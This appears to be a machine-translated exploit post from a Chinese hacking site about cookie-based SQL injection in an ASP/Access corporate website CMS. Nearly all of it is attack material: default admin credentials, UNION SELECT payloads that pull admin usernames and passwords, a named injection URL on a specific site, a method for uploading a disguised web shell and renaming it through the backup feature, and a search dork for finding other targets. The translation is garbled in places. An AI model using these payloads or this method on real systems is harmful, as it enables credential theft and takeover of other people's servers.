Houben figure enterprise website system cookies injection-vulnerability warning-the black bar safety net

ID MYHACK58:62201131380
Type myhack58
Reporter 佚名
Modified 2011-07-29T00:00:00


Based on asp+access corporate website source code, database has been provided with an anti-download the site more secure. To modify a site, custom your own to the page, and landscaping page is your own complete, website source code program is complete, the background powerful.

Source code download: http://www.aspjzy.com/12746.html

Program complete log back:/admin/login. asp

The default landing account:admin password:admin888

Statement: (preceded by a space)

and 1=2 union select 1,username,password,4,5,6,7,8,9,1 0 from admin

Or is 1 6 fields:

and 1=2 union select 1,username,password,4,5,6,7,8,9,1 0,1 1,1 2,1 3,1 4,1 5,1 6 from admin

Burst out yourself to guess the field.

Injection point: http://www.xueyu.org/shownews.asp?=88

getshell:background there is a backup, upload pictures of ponies. Backup name:. asp access xxx.com/databakup/a.asp


inurl:shownews? asp. id=